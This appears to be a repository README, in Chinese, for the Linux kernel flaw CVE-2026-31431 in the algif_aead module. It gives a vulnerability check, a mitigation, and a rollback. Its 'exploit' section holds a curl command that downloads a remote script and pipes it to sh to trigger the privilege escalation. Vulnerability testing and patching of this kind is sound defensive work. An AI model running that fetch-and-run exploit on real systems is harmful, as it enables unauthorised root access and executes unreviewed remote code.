studiogangster/CVE-2026-31431

### 测试、补丁、修复：CVE-2026-31431 ``` # 测试：检查 vuln python3 -c 'import socket;exec("try:s=socket.socket(socket.AF_ALG,socket.SOCK_SEQPACKET,0);s.bind((\"aead\",\"authencesn(hmac(sha256),cbc(aes))\"));print(\"vulnerable\")\nexcept:print(\"not vulnerable\")")' ``` ``` # 检查是否为 module # 检查 module 是否已加载到 kernel 中 lsmod | grep -q '^algif_aead' && echo "loaded" || echo "not loaded" ``` ``` # 修复：移除 mod echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf rmmod algif_aead 2>/dev/null || true ``` ``` # 回滚：重新加载 mod sudo rm -f /etc/modprobe.d/disable-algif.conf sudo depmod -a ``` #### 漏洞利用 ``` # exploit curl https://raw.githubusercontent.com/studiogangster/CVE-2026-31431/refs/heads/main/test.sh | sh ```

标签：AF_ALG, algif_aead, Cutter, CVE-2026-31431, Linux漏洞, Maven, POC, Python, Shell脚本, Web报告查看器, 内核模块, 内核漏洞, 协议分析, 安全基线, 安全检测脚本, 安全资源, 教学环境, 数据展示, 无后门, 本地提权, 权限提升, 沙箱逃逸, 漏洞修复, 漏洞验证, 红队, 网络安全, 网络安全培训, 隐私保护